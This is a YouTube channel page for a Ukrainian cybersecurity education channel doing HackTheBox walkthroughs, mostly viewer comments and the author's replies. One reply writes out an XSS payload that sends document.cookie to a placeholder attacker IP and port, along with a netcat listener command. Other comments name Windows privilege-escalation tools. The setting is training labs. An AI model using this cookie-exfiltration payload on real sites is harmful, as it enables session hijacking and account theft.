Тёмный
In4Sec.
In4Sec.
In4Sec.
Подписаться
Даний канал створений для навчання і розвитку навичок кібербезпеки.
Це не пропаганда хакінгу і зламу. Тут ми вчимося думати, аналізувати і розробляти стратегії захисту.
Всі дії проводяться або на домашніх віртуальних машинах, або на спеціальних навчальних площадках типу HackTheBox та TryHackMe.

Комментарии
@kovkc34
@kovkc34 10 дней назад
Кльово! Продовжуй друже :)
@alekseibarilo8587
@alekseibarilo8587 11 дней назад
Як гарно!
@andrii_nya
@andrii_nya 15 дней назад
cmp eax, dword[ebp-30] - порівння, і про це тобі пише в коментарях в самому дебагері, xor - теж не порівняння, а логічне виключення. Не варто без основ лізти в реверс якщо не знаєш базу, не варто розкривати цю тему. Ви молоді, жартівливі, вам легко. Це не те. Це не Чикатіло і навіть не архіви спецслужб. Сюди краще не лізти. Серйозно, будь-хто з вас шкодуватиме. Краще закрийте тему та забудьте, що тут писалося. Я цілком розумію, що даним повідомленням викликаю додатковий інтерес, але хочу одразу застерегти допитливих - стоп. Решту просто не знайдуть.
@SjPn11
@SjPn11 13 дней назад
Ви абсолютно праві. Був би Вам вдячний за посилання на матеріали для навчання.
@andrii_nya
@andrii_nya 13 дней назад
@@SjPn11 рікардо нарваха і reverse engineering for beginners
@SHKIPPER989
@SHKIPPER989 15 дней назад
Спасибі за відео! Цікаво послухати)
@ТкачукИгорь
@ТкачукИгорь 18 дней назад
Persistent я би переклав як "закріпитися в системі", "отримати постійний доступ до системи, такий, що зберігається після перезавантаження системи"
@ТкачукИгорь
@ТкачукИгорь 19 дней назад
Порадьте чи є сенс проходити на htb їхню академію.
@SjPn11
@SjPn11 19 дней назад
Навчатись завжди сенс є. Я б для початку порекомендував академію TryHackMe, але судячи з рівня ваших питань, Ви сміливо можете проходитит більш складну академію від HTB
@SjPn11
@SjPn11 19 дней назад
Сенс в ній є, але є деякі модулі(наприклад, active directory), які дуже сумбурно пояснюються. Треба додатково багато ще прочитати
@ТкачукИгорь
@ТкачукИгорь 18 дней назад
В мене є подарунковий сертифікат від htb. Намагаюся зрозуміти як його з користю використати.
@ТкачукИгорь
@ТкачукИгорь 19 дней назад
Не зовсім зрозумів, чому заміна user-agent в запиті на тег html img повернула адмінську куку. Цей тег парситься і виконується браузером на стороні клієнта при рендерінгу в разі помилки, тобто в даному випадку - недійсному джерелі картинки. Можете пояснити? За відео - дякую!
@SjPn11
@SjPn11 19 дней назад
Дуже слушне запитання. Це атака типу Cross Site Scripting. Суть самої команди в тому, щоб на стороні клієнта браузер знайшов посилання на картинку, але не отримав до неї маршрута. А в разі помилки(onerror) він звернувся до нашого АйПі і відправив нам кукі юзера браузера(+document.cookie). Ми ж все це отримуємо на своєму ПК за допомогою NetCat Listener(nc -lnvp PORT). Також можна було б використати, наприклад і таку команду - <script>var i=new Image(); i.src="OUR IP:OUR PORT/?cookie="+btoa(document.cookie);</script>
@ТкачукИгорь
@ТкачукИгорь 19 дней назад
А чому ми не могли ту саму куку отримати з того ж Burp у відповіді сервера, коли отримали сторінку з помилкою? Чи Ви мали бажання продемонструвати xss вразливість? Мене дещо дивує, що сервер разом зі сторінкою помилки повертає адмінську куку. Але мабуть це просто, в якості геймефікації процесу зроюлено htb, бо в реальному житті, як на мене в цьому мало сенсу. Мабуть для реалізації xss в користувача на сусідній вкладці має вже бути відкрита алмінська сесія, чи жива адмінська кука. Дякую за відповідь.
@SjPn11
@SjPn11 19 дней назад
@@ТкачукИгорь Абсолютно вірно кажете. По-перше, так, це деяка гейміфікація. По-друге, "машинка" налаштована так, що відкрита з боку браузера адмінська сессія. По-третє, в реальних кейсах це не дуже ймовірний напрям атаки, адже завжди ефективніше відправити фішингові листи, чи підібрати пароль звичайних юзерів і вже від легітимного юзера відправити знову ж таки фішинговий дист адміну
@Z3rgatul
@Z3rgatul 22 дня назад
Оооо, -бандікам +ОБС
@pavelgrigorov1296
@pavelgrigorov1296 Месяц назад
супер
@ThisIsaWayRegulus
@ThisIsaWayRegulus Месяц назад
Дійсно, прикольна машина! Дякую, за цікавий контент
@ВалерйЯловий
@ВалерйЯловий Месяц назад
реально кайф)
@ВалерйЯловий
@ВалерйЯловий Месяц назад
класно та цiкаво пояснюеш деталi)
@СашаМакар-р6и
@СашаМакар-р6и Месяц назад
👍👍👍
@ThisIsaWayRegulus
@ThisIsaWayRegulus Месяц назад
Курто! Продовжуй, реально класний контент та цікава тематика!
@Kostiantyn_Bobkov
@Kostiantyn_Bobkov Месяц назад
Щоб не запам'ятовувати багато складних паролів, можна використовувати менеджери паролів.
@Leonid-em4ic
@Leonid-em4ic Месяц назад
вся сіль в процесі тож дуже цікаво
@МаксимНечаєв
@МаксимНечаєв 2 месяца назад
80 веб портал 443 тоді що?
@member2701
@member2701 Месяц назад
80 - http 443 - https але порти це просто абстракції і на 80 порті умовно може бути навіть якись FTP сервіс
@TheCondor
@TheCondor 2 месяца назад
👍
@ОлегПотєхін
@ОлегПотєхін 2 месяца назад
Ви часм менторство не практикуєте?)
@SjPn11
@SjPn11 2 месяца назад
Все можливо )
@ОлегПотєхін
@ОлегПотєхін 2 месяца назад
@@SjPn11 Хотів би стати вашим падаваном)
@uzeruzet1077
@uzeruzet1077 2 месяца назад
Відео цікаве, хоча я майже нічого не зрозумів, але це через брак знань
@SjPn11
@SjPn11 2 месяца назад
Колись я так само дивився подібні відео і майже нічого не розумів... Але, якщо у вас є базові знання в комп'ютерних технологіях, то за рік цілком можливо підтягнутись до пристойного рівня
@330green
@330green 2 месяца назад
А як ви дійшли до пароля hacktheblue ?)
@SjPn11
@SjPn11 2 месяца назад
Вітаю. Коли качаєте архівний файл, там є дві іконки - скачати і іконка у вигляді ключа. Якщо натиснути на цей ключ - буде пароль
@TheCondor
@TheCondor 2 месяца назад
👍
@oleffkaaa
@oleffkaaa 3 месяца назад
Дякую за контент! Цікаво коли перший раз проходите ) P.S. Можна збільшувати шрифт у консолі , на планшеті погано видно 😂
@SjPn11
@SjPn11 3 месяца назад
Дякую за відгук. Вчора записував новий відос - згадав про побажання більшого шрифта :) Далі буже краще.
@oleffkaaa
@oleffkaaa 3 месяца назад
@@SjPn11 Новий відос, це круто ) Чекаємо!)
@TheCondor
@TheCondor 3 месяца назад
Thank you for the video!👍
@SjPn11
@SjPn11 3 месяца назад
Thanks for watching. Hope you enjoy it 😊
@TheCondor
@TheCondor 3 месяца назад
Дякую за відео 👍
@SjPn11
@SjPn11 3 месяца назад
Дякую за відгук
@oleffkaaa
@oleffkaaa 3 месяца назад
Дякую за контент! Цікаві обидві теми, але більш то про взлам :)
@SjPn11
@SjPn11 3 месяца назад
Дякую за відгук. Прийму до уваги побажання :)
@TheCondor
@TheCondor 3 месяца назад
👍
@SHKIPPER989
@SHKIPPER989 3 месяца назад
👍👍👍
@oleffkaaa
@oleffkaaa 3 месяца назад
Трішки би більше консоль та взагалі шрифт :)
@SjPn11
@SjPn11 3 месяца назад
Дякую за слушне побажання :)
@oleffkaaa
@oleffkaaa 3 месяца назад
Новий відос :) Дякую за контект!
@SjPn11
@SjPn11 3 месяца назад
Дякую за комент :) а ви проходите машинки на HTB?
@oleffkaaa
@oleffkaaa 3 месяца назад
@@SjPn11 Поки що ні :) але цікава ця тематика)
@oleffkaaa
@oleffkaaa 3 месяца назад
Було цікаво Коментар для підтримки україномовного ютубу :)
@oleffkaaa
@oleffkaaa 3 месяца назад
Не дужее тай швидко для ізі машини :) Дякую за контент) Коли некст левел буде? :)
@SjPn11
@SjPn11 3 месяца назад
Дякую за відгук. Трошки ще повирішуємо рівень Easy, і перейдемо до Medium... Хоча там вже буде на порядок складніше
@oleffkaaa
@oleffkaaa 3 месяца назад
@@SjPn11 буду чекати, цікавий контент!
@oleffkaaa
@oleffkaaa 3 месяца назад
Дякую за україномовний контент :)
@oleffkaaa
@oleffkaaa 3 месяца назад
Дякую за україномовний контент :)
@TheCondor
@TheCondor 3 месяца назад
👍
@ozamodaz
@ozamodaz 3 месяца назад
Я використовую `pwgen 18 1 -y` рік від року потроху збільшуючи довжину та Bitwarden. Останній крім функціоналу збереження паролів має у веб-версії розділ Reports який є гарним помічником в дотриманні гігієни паролів. Він покаже які з ваших паролів є в публічно доступних базах, покаже ваші паролі які ви ре-юзаєте на кількох сайтах, слабкі паролі і таке інше. Звичайно тут вже є ризики зламу самого Bitwarden, але наче можна власноруч хостити сховище (але це не точно).
@TheCondor
@TheCondor 3 месяца назад
👍
@billy6395
@billy6395 3 месяца назад
Класний контент. Мені теж подобається вирішувати машинки на HackTheBox.
@Simon_Bassil
@Simon_Bassil 3 месяца назад
Це точно easy lvl?
@SjPn11
@SjPn11 3 месяца назад
Так, це Easy. У них всі свіжі машинки стали складніше. Рівень Easy в 2017 та в 2024 дуже відрізняються.
@Simon_Bassil
@Simon_Bassil 3 месяца назад
@@SjPn11 коли я проходив у них CTF, то я теж помітив що якось складно, але тут ще складніше)
@ozamodaz
@ozamodaz 3 месяца назад
Якшо це був не жарт щодо вийти із Vim, то поділюсь лайфаком, якого мене навчили бородаті адміни і адмінші в одном старом київськом дата-центрі: самий зручний на мій погляд хоткей для виходу це ZZ щоб вийти і зберегти та ZQ щоб вийти без збереження (саме на Шифті). Воно як раз прожимається одной лівой рукой дуже зручно.
@SjPn11
@SjPn11 3 месяца назад
Дякую за цей лайфхак. Не знав такого хоткею. Знав тільки про :q!
@TheCondor
@TheCondor 3 месяца назад
Дякую за відео!👍
@TheCondor
@TheCondor 4 месяца назад
Дякую за відео, вже чекаю наступне!)
@SjPn11
@SjPn11 4 месяца назад
Дякую за відгук. Наступні відоси вже монтуються і скоро вийдуть.
@Roy-cu2iw
@Roy-cu2iw 4 месяца назад
Is spanish you see something about the languajes on certificates info on nmap
@SjPn11
@SjPn11 4 месяца назад
You are absolutely right 👍
@hellmen81
@hellmen81 4 месяца назад
Дуже круто, як на мене. Я колись Kali завантажува і щось пробував робити, але мене потім в back-end завернуло і на тому моє знайомство з цим закінчилось. Зараз дивлюсь з задоволенням і вже руки чухаються спробувати знову) ПС. чудова в тебе шпаргалочка)
@SjPn11
@SjPn11 4 месяца назад
Дякую! Певен, що знання бек-енду надасть додаткових плюсів при спробі пентеста :) Раджу спробувати
@hellmen81
@hellmen81 4 месяца назад
@@SjPn11 думаю, що ще пару твоїх відео, віртуалка, калі і купа документації мені обезпечені)
@BitbixCompany
@BitbixCompany 4 месяца назад
Лагуча машинка попалася. Не знаю,баг це чи ні, але я отримав адміністратора за допомогою SeImpersonatePrivilege і PrintSpoofer. Так ось при команді whoami /priv показувало ось це: SeIncreaseQuotaPrivilege Ajustar las cuotas de la memoria para un proceso Enabled SeSecurityPrivilege Administrar registro de seguridad y auditor¡a Enabled SeTakeOwnershipPrivilege Tomar posesi¢n de archivos y otros objetos Enabled SeLoadDriverPrivilege Cargar y descargar controladores de dispositivo Enabled SeSystemProfilePrivilege Generar perfiles del rendimiento del sistema Enabled SeSystemtimePrivilege Cambiar la hora del sistema Enabled SeProfileSingleProcessPrivilege Generar perfiles de un solo proceso Enabled SeIncreaseBasePriorityPrivilege Aumentar prioridad de programaci¢n Enabled SeCreatePagefilePrivilege Crear un archivo de paginaci¢n Enabled SeBackupPrivilege Hacer copias de seguridad de archivos y directorios Enabled SeRestorePrivilege Restaurar archivos y directorios Enabled SeShutdownPrivilege Apagar el sistema Enabled SeDebugPrivilege Depurar programas Enabled SeSystemEnvironmentPrivilege Modificar valores de entorno firmware Enabled SeChangeNotifyPrivilege Omitir comprobaci¢n de recorrido Enabled SeRemoteShutdownPrivilege Forzar cierre desde un sistema remoto Enabled SeUndockPrivilege Quitar equipo de la estaci¢n de acoplamiento Enabled SeManageVolumePrivilege Realizar tareas de mantenimiento del volumen Enabled SeImpersonatePrivilege Suplantar a un cliente tras la autenticaci¢n Enabled SeCreateGlobalPrivilege Crear objetos globales Enabled SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Enabled SeTimeZonePrivilege Cambiar la zona horaria Enabled SeCreateSymbolicLinkPrivilege Crear v¡nculos simb¢licos Enabled SeDelegateSessionUserImpersonatePrivilege Obt‚n un token de suplantaci¢n para otro usuario en la misma sesi¢n Enabled
@hellmen81
@hellmen81 4 месяца назад
Дякую за відео! Таке питання, як на рахунок Linux? До нього теж так можна отримати доступ? Чи потрібні вже інші інструменти?
@SjPn11
@SjPn11 4 месяца назад
Дякую за питання! Я б не поділяв саме тут на Win чи Linux, адже ми більше використовували вразливість сервісу SMB. Для Linux є аналогічний CVE-2017-7494. P. S. Відчуваю потребу в записі відоса на тему "що потрібно, аби стати пентестером"
@hellmen81
@hellmen81 4 месяца назад
@@SjPn11 це було б чудово. Таке відео, як на мене, потрібне. Я, наприклад, із задоволенням би подивився.
@SjPn11
@SjPn11 4 месяца назад
@@hellmen81 раз потрібне - обов'язково зроблю :)
@Вітер-ъ6р
@Вітер-ъ6р 2 месяца назад
Тааа, давай з портом filtered
@Palianycia
@Palianycia 4 месяца назад
Класний контент, надію канал і дальше буде розвиватись ;)
@SjPn11
@SjPn11 4 месяца назад
Дякую. Якщо буде цікаво глядачам - обов'язково продовжу 😊
@Tommy7417
@Tommy7417 4 месяца назад
Було цікаво Коментар для підтримки україномовного ютубу 👍
@SjPn11
@SjPn11 4 месяца назад
Дякую за підтримку
@Lapiduse
@Lapiduse 4 месяца назад
Administrador це мабуть тому, що мова/локаль вмки може бути португальска)
@SjPn11
@SjPn11 4 месяца назад
Ви абсолютно праві і дуже уважні!
@tatarinova2603
@tatarinova2603 4 месяца назад
👍👍👍